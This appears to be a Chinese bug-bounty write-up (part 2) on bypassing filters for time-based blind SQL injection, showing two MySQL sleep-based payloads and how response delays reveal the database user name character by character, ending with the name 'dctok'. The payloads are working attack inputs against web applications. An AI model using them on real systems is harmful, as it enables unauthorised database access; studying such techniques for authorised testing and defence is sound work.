主页 > 网络知识 > 一次众测实战sql注入绕过(2)

一次众测实战sql注入绕过(2)

 

image.png

 

 

 

步骤二:

当payload为

'and(select*from(select+sleep(if(user()>'d',3,0)))a)and'a'=' ,

延迟为6秒,说明也为true,用户名的第一位字母的ascii码对应大于或等于d字母的ascii码,即大于或等于100

 

image.png

 

 

 

步骤三:

当payload为'and(select*from(select+sleep(if(user()>'e',3,0)))a)and'a'=' ,

延迟为0秒,说明为false,用户名的第一位字母的ascii码对应小于e字母的ascii码,即小于101

 

image.png

 

 

 

最后根据结果分析:

根据步骤二,用户名第一位字母的ascii码大于或者等于100;

根据步骤三,用户名的第一位字母的ascii码小于101,

最后得出用户名第一位字母的ascii码为100,即字母d.

依次类推,最后得出用户名为dctok

 

image.png

说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!